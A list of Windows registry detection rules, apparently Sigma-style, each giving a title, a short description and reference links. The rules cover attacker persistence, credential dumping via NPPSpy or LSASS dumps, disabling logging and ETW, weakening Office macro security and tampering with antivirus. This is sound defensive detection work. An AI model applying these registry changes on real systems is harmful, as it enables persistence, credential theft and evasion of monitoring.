https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf
Directory Service Restore Mode (DSRM) Registry Value Tampering Detects changes to the "DsrmAdminLogonBehavior" registry value. During a Domain Controller (DC) promotion, administrators create a Directory Services Restore Mode (DSRM) local administrator account with a password that rarely changes. The DSRM account is an "Administrator" account that logs in with the DSRM mode when the server is booting up to restore AD backups or recover the server from a failure. Attackers could abuse the DSRM account to maintain their persistence and access to the organization's Active Directory. If the "DsrmAdminLogonBehavior" value is set to "0", the administrator account can only be used if the DC starts in DSRM. If the "DsrmAdminLogonBehavior" value is set to "1", the administrator account can only be used if the local AD DS service is stopped. If the "DsrmAdminLogonBehavior" value is set to "2", the administrator account can always be used. https://adsecurity.org/?p=1785, https://www.sentinelone.com/blog/detecting-dsrm-account-misconfigurations/, https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/dsrm-credentials
Periodic Backup For System Registry Hives Enabled Detects the enabling of the "EnablePeriodicBackup" registry value. Once enabled, the OS will back up System registry hives on restarts to the "C:\Windows\System32\config\RegBack" folder. Windows creates a "RegIdleBackup" task to manage subsequent backups. Registry backup was a default behavior on Windows and was disabled as of "Windows 10, version 1803". https://learn.microsoft.com/en-us/troubleshoot/windows-client/installing-updates-features-roles/system-registry-no-backed-up-regback-folder
Windows Recall Feature Enabled - Registry Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by setting the value of "DisableAIDataAnalysis" to "0". Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities. This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary. https://learn.microsoft.com/en-us/windows/client-management/manage-recall, https://learn.microsoft.com/en-us/windows/client-management/mdm/policy-csp-windowsai#disableaidataanalysis
Enabling COR Profiler Environment Variables Detects .NET Framework CLR and .NET Core CLR "cor_enable_profiling" and "cor_profiler" variables being set and configured. https://twitter.com/jamieantisocial/status/1304520651248668673, https://www.slideshare.net/JamieWilliams130/started-from-the-bottom-exploiting-data-sources-to-uncover-attck-behaviors, https://www.sans.org/cyber-security-summit/archives, https://learn.microsoft.com/en-us/dotnet/core/runtime-config/debugging-profiling
Potential EventLog File Location Tampering Detects tampering with the EventLog service "file" key in order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting https://learn.microsoft.com/en-us/windows/win32/eventlog/eventlog-key
Scripted Diagnostics Turn Off Check Enabled - Registry Detects enabling of TurnOffCheck, which can be used to bypass the defense against the MSDT Follina vulnerability https://twitter.com/wdormann/status/1537075968568877057?s=20&t=0lr18OAnmAGoGpma6grLUw
Suspicious Application Allowed Through Exploit Guard Detects applications being added to the "allowed applications" list of exploit guard in order to bypass controlled folder settings https://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/
Change User Account Associated with the FAX Service Detects a change of the user account associated with the FAX service in order to avoid the escalation problem. https://twitter.com/dottor_morte/status/1544652325570191361, https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf
Change the Fax Dll Detects possible persistence via a Fax DLL that is loaded when the service restarts https://twitter.com/dottor_morte/status/1544652325570191361, https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf
New File Association Using Exefile Detects the abuse of the exefile handler in new file association. Used for bypass of security products. https://twitter.com/mrd0x/status/1461041276514623491
Add Debugger Entry To Hangs Key For Persistence Detects when an attacker adds a new "Debugger" value to the "Hangs" key in order to achieve persistence, which will get invoked when an application crashes https://persistence-info.github.io/Data/wer_debugger.html, https://www.hexacorn.com/blog/2019/09/20/beyond-good-ol-run-key-part-116/
Persistence Via Hhctrl.ocx Detects when an attacker modifies the registry value of the "hhctrl" to point to a custom binary https://persistence-info.github.io/Data/hhctrl.html, https://www.hexacorn.com/blog/2018/04/23/beyond-good-ol-run-key-part-77/
Registry Modification to Hidden File Extension Detects hiding of file extensions through modification of the registry https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-1---modify-registry-of-current-user-profile---cmd, https://unit42.paloaltonetworks.com/ransomware-families/, https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanSpy%3aMSIL%2fHakey.A
Displaying Hidden Files Feature Disabled Detects modifications to the "Hidden" and "ShowSuperHidden" explorer registry values in order to disable showing of hidden files and system files. This technique is abused by several malware families to hide their files from normal users. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-8---hide-files-through-registry
Registry Hide Function from User Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique) https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md
Hide Schedule Task Via Index Value Tamper Detects when the "index" value of a scheduled task is modified in the registry, which effectively hides it from any tooling such as "schtasks /query" (read the referenced link for more information about the effects of this technique) https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
Driver Added To Disallowed Images In HVCI - Registry Detects changes to the "HVCIDisallowedImages" registry value to potentially add a driver to the list, in order to prevent it from loading. https://github.com/yardenshafir/conference_talks/blob/3de1f5d7c02656c35117f067fbff0a219c304b09/OffensiveCon_2023_Your_Mitigations_are_My_Opportunities.pdf, https://x.com/yarden_shafir/status/1822667605175324787
IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally. https://twitter.com/M_haggis/status/1699056847154725107, https://twitter.com/JAMESWT_MHT/status/1699042827261391247, https://learn.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries, https://www.virustotal.com/gui/file/339ff720c74dc44265b917b6d3e3ba0411d61f3cd3c328e9a2bae81592c8a6e5/content
Uncommon Extension In Keyboard Layout IME File Registry Value Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message. Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path. IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean. https://www.linkedin.com/pulse/guntior-story-advanced-bootkit-doesnt-rely-windows-disk-baranov-wue8e/
Suspicious Path In Keyboard Layout IME File Registry Value Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message. Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path. IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean. https://www.linkedin.com/pulse/guntior-story-advanced-bootkit-doesnt-rely-windows-disk-baranov-wue8e/
New Root or CA or AuthRoot Certificate to Store Detects the addition of new root, CA or AuthRoot certificates to the Windows registry https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md#atomic-test-6---add-root-certificate-to-currentuser-certificate-store, https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
Internet Explorer DisableFirstRunCustomize Enabled Detects changes to the Internet Explorer "DisableFirstRunCustomize" value, which prevents Internet Explorer from running the first run wizard the first time a user starts the browser after installing Internet Explorer or Windows. https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf, https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/, https://admx.help/?Category=InternetExplorer&Policy=Microsoft.Policies.InternetExplorer::NoFirstRunCustomise
Potential Ransomware Activity Using LegalNotice Message Detects changes to the "LegalNoticeCaption" or "LegalNoticeText" registry values where the message set contains keywords often used in ransomware ransom messages https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1491.001/T1491.001.md
Lolbas OneDriveStandaloneUpdater.exe Proxy Download Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any anomalous executables with suspicious arguments. The downloaded file will be in C:\Users\redacted\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/
Lsass Full Dump Request Via DumpType Registry Settings Detects the setting of the "DumpType" registry value to "2" which stands for a "Full Dump". Technique such as LSASS Shtinkering requires this value to be "2" in order to dump LSASS. https://github.com/deepinstinct/Lsass-Shtinkering, https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps, https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf
RestrictedAdminMode Registry Value Tampering Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode. RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop. This prevents your credentials from being harvested during the initial connection process if the remote server has been compromised https://github.com/redcanaryco/atomic-red-team/blob/a8e3cf63e97b973a25903d3df9fd55da6252e564/atomics/T1112/T1112.md, https://social.technet.microsoft.com/wiki/contents/articles/32905.remote-desktop-services-enable-restricted-admin-mode.aspx
Blue Mockingbird - Registry Attempts to detect system changes made by Blue Mockingbird https://redcanary.com/blog/blue-mockingbird-cryptominer/
Potential Persistence Via Netsh Helper DLL - Registry Detects changes to the Netsh registry key to add a new DLL value. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper https://www.ired.team/offensive-security/persistence/t1128-netsh-helper-dll, https://pentestlab.blog/2019/10/29/persistence-netsh-helper-dll/
New Netsh Helper DLL Registered From A Suspicious Location Detects changes to the Netsh registry key to add a new DLL value that is located on a suspicious location. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper https://www.ired.team/offensive-security/persistence/t1128-netsh-helper-dll, https://pentestlab.blog/2019/10/29/persistence-netsh-helper-dll/
.NET NGenAssemblyUsageLog Registry Key Tamper Detects changes to the NGenAssemblyUsageLog registry key. The .NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section). By simply specifying an arbitrary value (e.g. a fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created. https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/
New Application in AppCompat A general detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint. https://github.com/OTRF/detection-hackathon-apt29/issues/1, https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/1.A.1_DFD6A782-9BDB-4550-AB6B-525E825B095E.md
Potential Credential Dumping Attempt Using New NetworkProvider - REG Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it https://learn.microsoft.com/en-us/troubleshoot/windows-client/setup-upgrade-and-drivers/network-provider-settings-removed-in-place-upgrade, https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy
New ODBC Driver Registered Detects the registration of a new ODBC driver. https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/
Potentially Suspicious ODBC Driver Registered Detects the registration of a new ODBC driver where the driver is located in a potentially suspicious location https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/
Microsoft Office Protected View Disabled Detects changes to Microsoft Office protected view registry keys with which the attacker disables this feature. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/, https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/, https://admx.help/HKCU/software/policies/microsoft/office/16.0/excel/security/protectedview
Trust Access Disable For VBApplications Detects registry changes to Microsoft Office "AccessVBOM" to a value of "1" which disables trust access for VBA on the victim machine and lets attackers execute malicious macros without any Microsoft Office warnings. https://twitter.com/inversecos/status/1494174785621819397, https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/, https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/
Python Function Execution Security Warning Disabled In Excel - Registry Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed. Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet. https://support.microsoft.com/en-us/office/data-security-and-python-in-excel-33cc88a4-4a87-485e-9ff9-f35958278327
Enable Microsoft Dynamic Data Exchange Detects enabling of the Dynamic Data Exchange (DDE) protocol in all supported editions of Microsoft Word or Excel. https://msrc.microsoft.com/update-guide/vulnerability/ADV170021
Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting Detects the modification of the Outlook setting "LoadMacroProviderOnBoot" which, if enabled, allows the automatic loading of any configured VBA project/module https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53, https://www.linkedin.com/pulse/outlook-backdoor-using-vba-samir-b-/
Outlook Macro Execution Without Warning Setting Enabled Detects the modification of Outlook security setting to allow unprompted execution of macros. https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/, https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53
Outlook EnableUnsafeClientMailRules Setting Enabled - Registry Detects an attacker trying to enable the Outlook security setting "EnableUnsafeClientMailRules" which allows Outlook to run applications or execute macros https://support.microsoft.com/en-us/topic/how-to-control-the-rule-actions-to-start-an-application-or-run-a-macro-in-outlook-2016-and-outlook-2013-e4964b72-173c-959d-5d7b-ead562979048, https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=44
Outlook Security Settings Updated - Registry Detects changes to the registry values related to Outlook security settings https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137/T1137.md, https://learn.microsoft.com/en-us/outlook/troubleshoot/security/information-about-email-security-settings
Uncommon Microsoft Office Trusted Location Added Detects changes to registry keys related to "Trusted Location" of Microsoft Office where the path is set to something uncommon. Attackers might add additional trusted locations to avoid macro security restrictions. Internal Research, https://admx.help/?Category=Office2016&Policy=excel16.Office.Microsoft.Policies.Windows::L_TrustedLoc01
Macro Enabled In A Potentially Suspicious Document Detects registry changes to Office trust records where the path is located in a potentially suspicious location https://twitter.com/inversecos/status/1494174785621819397, Internal Research
Office Macros Warning Disabled Detects registry changes to Microsoft Office "VBAWarning" to a value of "1" which enables the execution of all macros, whether signed or unsigned. https://twitter.com/inversecos/status/1494174785621819397, https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/, https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/
MaxMpxCt Registry Value Changed Detects changes to the "MaxMpxCt" registry value. MaxMpxCt specifies the maximum outstanding network requests for the server per client, which is used when negotiating a Server Message Block (SMB) connection with a client. Note that if the value is set beyond 125, older Windows 9x clients will fail to negotiate. Ransomware threat actors and operators (specifically BlackCat) were seen increasing this value in order to handle a higher volume of traffic. https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps, https://securityscorecard.com/research/deep-dive-into-alphv-blackcat-ransomware, https://www.intrinsec.com/alphv-ransomware-gang-analysis/?cn-reloaded=1, https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/
Potential Persistence Using DebugPath Detects potential persistence using Appx DebugPath https://oddvar.moe/2018/09/06/persistence-using-universal-windows-platform-apps-appx/, https://github.com/rootm0s/WinPwnage
Potential Persistence Via AppCompat RegisterAppRestart Layer Detects the setting of the REGISTERAPPRESTART compatibility layer on an application. This compatibility layer allows an application to register for restart using the "RegisterApplicationRestart" API. This can be potentially abused as a persistence mechanism. https://github.com/nasbench/Misc-Research/blob/d114d6a5e0a437d3818e492ef9864367152543e7/Other/Persistence-Via-RegisterAppRestart-Shim.md
Potential Persistence Via App Paths Default Property Detects changes to the "Default" property for keys located in the \Software\Microsoft\Windows\CurrentVersion\App Paths\ registry. Which might be used as a method of persistence The entries found under App Paths are used primarily for the following purposes. First, to map an application's executable file name to that file's fully qualified path. Second, to prepend information to the PATH environment variable on a per-application, per-process basis. https://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/, https://learn.microsoft.com/en-us/windows/win32/shell/app-registration
Potential Persistence Via AutodialDLL Detects changes to the "AutodialDLL" key, which could be used as a persistence method to load a custom DLL via the "ws2_32" library https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/, https://persistence-info.github.io/Data/autodialdll.html
Potential Persistence Via CHM Helper DLL Detects when an attacker modifies the registry key "HtmlHelp Author" to achieve persistence https://persistence-info.github.io/Data/htmlhelpauthor.html, https://www.hexacorn.com/blog/2018/04/22/beyond-good-ol-run-key-part-76/
Potential PSFactoryBuffer COM Hijacking Detects changes to the PSFactory COM InProcServer32 registry key. This technique was used by RomCom to establish persistence by storing a malicious DLL. https://blogs.blackberry.com/en/2023/06/romcom-resurfaces-targeting-ukraine, https://strontic.github.io/xcyclopedia/library/clsid_C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6.html, https://www.virustotal.com/gui/file/6d3ab9e729bb03ae8ae3fcd824474c5052a165de6cb4c27334969a542c7b261d/detection, https://www.trendmicro.com/en_us/research/23/e/void-rabisu-s-use-of-romcom-backdoor-shows-a-growing-shift-in-th.html
COM Object Hijacking Via Modification Of Default System CLSID Default Value Detects potential COM object hijacking via modification of default system CLSID. https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ (idea), https://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/, https://blog.talosintelligence.com/uat-5647-romcom/, https://global.ptsecurity.com/analytics/pt-esc-threat-intelligence/darkhotel-a-cluster-of-groups-united-by-common-techniques, https://threatbook.io/blog/Analysis-of-APT-C-60-Attack-on-South-Korea
Potential Persistence Via Custom Protocol Handler Detects potential persistence activity via the registering of a new custom protocol handler. While legitimate applications often register protocol handlers during installation, an attacker can abuse this by setting a custom handler to be used as a persistence mechanism. https://ladydebug.com/blog/2019/06/21/custom-protocol-handler-cph/
Potential Persistence Via Event Viewer Events.asp Detects potential registry persistence technique using the Event Viewer "Events.asp" technique https://twitter.com/nas_bench/status/1626648985824788480, https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.InternetCommunicationManagement::EventViewer_DisableLinks, https://www.hexacorn.com/blog/2019/02/15/beyond-good-ol-run-key-part-103/, https://github.com/redcanaryco/atomic-red-team/blob/f296668303c29d3f4c07e42bdd2b28d8dd6625f9/atomics/T1112/T1112.md
Potential Persistence Via GlobalFlags Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/, https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/
Modification of IE Registry Settings Detects modification of the registry settings used for Internet Explorer and other Windows components that use these settings. An attacker can abuse this registry key to add a domain to the Trusted Sites zone or insert JavaScript for persistence https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-5---javascript-in-registry
Register New IFiltre For Persistence Detects when an attacker registers a new IFilter for an extension. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files. https://persistence-info.github.io/Data/ifilters.html, https://twitter.com/0gtweet/status/1468548924600459267, https://github.com/gtworek/PSBits/tree/master/IFilter, https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/IFilter/Dll.cpp#L281-L308
Potential Persistence Via LSA Extensions Detects when an attacker modifies the "REG_MULTI_SZ" value named "Extensions" to include a custom DLL to achieve persistence via lsass. The "Extensions" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading. https://persistence-info.github.io/Data/lsaaextension.html, https://twitter.com/0gtweet/status/1476286368385019906
Potential Persistence Via Mpnotify Detects when an attacker registers a new SIP provider for persistence and defense evasion https://persistence-info.github.io/Data/mpnotify.html, https://www.youtube.com/watch?v=ggY3srD9dYs&ab_channel=GrzegorzTworek
Potential Persistence Via Excel Add-in - Registry Detects potential persistence via the creation of an Excel add-in (XLL) file that is made to run automatically when Excel is started. https://github.com/redcanaryco/atomic-red-team/blob/4ae9580a1a8772db87a1b6cdb0d03e5af231e966/atomics/T1137.006/T1137.006.md, https://labs.withsecure.com/publications/add-in-opportunities-for-office-persistence
Potential Persistence Via MyComputer Registry Keys Detects modification to the "Default" value of the "MyComputer" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example) https://www.hexacorn.com/blog/2017/01/18/beyond-good-ol-run-key-part-55/
Potential Persistence Via TypedPaths Detects modification of or addition to the 'TypedPaths' key in the user or admin registry from a non-standard application, which might indicate a persistence attempt https://twitter.com/dez_/status/1560101453150257154, https://forensafe.com/blogs/typedpaths.html
Potential Persistence Via Outlook Today Page Detects potential persistence activity via outlook today page. An attacker can set a custom page to execute arbitrary code and link to it via the registry values "URL" and "UserDefinedUrl". https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=74, https://trustedsec.com/blog/specula-turning-outlook-into-a-c2-with-one-registry-change
Potential Persistence Via Scrobj.dll COM Hijacking Detects use of scrobj.dll, as this DLL looks for the ScriptletURL key to get the location of the script to execute https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md
Potential WerFault ReflectDebugger Registry Value Abuse Detects potential WerFault "ReflectDebugger" registry value abuse for persistence. https://cocomelonc.github.io/malware/2022/11/02/malware-pers-18.html, https://www.hexacorn.com/blog/2018/08/31/beyond-good-ol-run-key-part-85/
Potential Persistence Via Visual Studio Tools for Office Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications. https://twitter.com/_vivami/status/1347925307643355138, https://vanmieghem.io/stealth-outlook-persistence/
Suspicious Shim Database Patching Activity Detects installation of new shim databases that try to patch sections of known processes for potential process injection or persistence. https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/, https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
PowerShell Script Execution Policy Enabled Detects the enabling of the PowerShell script execution policy. Once enabled, this policy allows scripts to be executed. https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.PowerShell::EnableScripts
Potential Attachment Manager Settings Associations Tamper Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information) https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738, https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465
Potential Persistence Via Outlook Home Page Detects potential persistence activity via outlook home page. An attacker can set a home page to achieve code execution and persistence by editing the WebView registry keys. https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=70, https://support.microsoft.com/en-us/topic/outlook-home-page-feature-is-missing-in-folder-properties-d207edb7-aa02-46c5-b608-5d9dbed9bd04?ui=en-us&rs=en-us&ad=us, https://trustedsec.com/blog/specula-turning-outlook-into-a-c2-with-one-registry-change
Potential Persistence Via DLLPathOverride Detects when an attacker adds a new "DLLPathOverride" value to the "Natural Language" key in order to achieve persistence; the referenced DLL will be invoked by the "SearchIndexer.exe" process https://persistence-info.github.io/Data/naturallanguage6.html, https://www.hexacorn.com/blog/2018/12/30/beyond-good-ol-run-key-part-98/
Potential Persistence Via Shim Database In Uncommon Location Detects the installation of a new shim database where the file is located in a non-default location https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html, https://andreafortuna.org/2018/11/12/process-injection-and-persistence-using-application-shimming/, https://www.blackhat.com/docs/asia-14/materials/Erickson/Asia-14-Erickson-Persist-It-Using-And-Abusing-Microsofts-Fix-It-Patches.pdf
Potential Attachment Manager Settings Attachments Tamper Detects tampering with attachment manager settings policies attachments (See reference for more information) https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738, https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465
PowerShell as a Service in Registry Detects PowerShell code written to the registry as a service. https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse
Potential Persistence Via Shim Database Modification Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-3---registry-key-creation-andor-modification-events-for-sdb, https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html, https://andreafortuna.org/2018/11/12/process-injection-and-persistence-using-application-shimming/
Potential PowerShell Execution Policy Tampering Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.3
Suspicious Powershell In Registry Run Keys Detects potential PowerShell commands or code within registry run keys https://github.com/frack113/atomic-red-team/blob/a9051c38de8a5320b31c7039efcbd3b56cf2d65a/atomics/T1547.001/T1547.001.md#atomic-test-9---systembc-malware-as-a-service-registry, https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html
PowerShell Logging Disabled Via Registry Key Tampering Detects changes to the registry for the currently logged-in user in order to disable PowerShell module logging, script block logging, or transcription and script execution logging https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-32---windows-powershell-logging-disabled
Potential Provisioning Registry Key Abuse For Binary Proxy Execution - REG Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe". https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/, https://twitter.com/0gtweet/status/1674399582162153472
Usage of Renamed Sysinternals Tools - RegistrySet Detects non-Sysinternals tools setting the "accepteula" key, which is normally set on Sysinternals tool execution. Internal Research
ETW Logging Disabled For rpcrt4.dll Detects changes to the "ExtErrorInformation" key in order to disable ETW logging for rpcrt4.dll http://redplait.blogspot.com/2020/07/whats-wrong-with-etw.html
Potentially Suspicious Command Executed Via Run Dialog Box - Registry Detects execution of commands via the run dialog box on Windows by checking values of the "RunMRU" registry key. This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps. https://medium.com/@ahmed.moh.farou2/fake-captcha-campaign-on-arabic-pirated-movie-sites-delivers-lumma-stealer-4f203f7adabf, https://medium.com/@shaherzakaria8/downloading-trojan-lumma-infostealer-through-capatcha-1f25255a0e71, https://www.forensafe.com/blogs/runmrukey.html, https://redcanary.com/blog/threat-intelligence/intelligence-insights-october-2024/
ScreenSaver Registry Key Set Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl https://twitter.com/VakninHai/status/1517027824984547329, https://twitter.com/pabraeken/status/998627081360695297, https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files
Potential SentinelOne Shell Context Menu Scan Command Tampering Detects potentially suspicious changes to the SentinelOne context menu scan command by a process other than SentinelOne. https://mrd0x.com/sentinelone-persistence-via-menu-context/
ETW Logging Disabled For SCM Detects changes to the "TracingDisabled" key in order to disable ETW logging for services.exe (SCM) http://redplait.blogspot.com/2020/07/whats-wrong-with-etw.html
ServiceDll Hijack Detects changes to the "ServiceDLL" value related to a service in the registry. This is often used as a method of persistence. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md#atomic-test-4---tinyturla-backdoor-service-w64time, https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/
Registry Explorer Policy Modification Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique) https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md
Persistence Via New SIP Provider Detects when an attacker registers a new SIP provider for persistence and defense evasion https://persistence-info.github.io/Data/codesigning.html, https://github.com/gtworek/PSBits/tree/master/SIP, https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf
Tamper With Sophos AV Registry Keys Detects attempts to tamper with Sophos AV functionality via registry key modification https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/
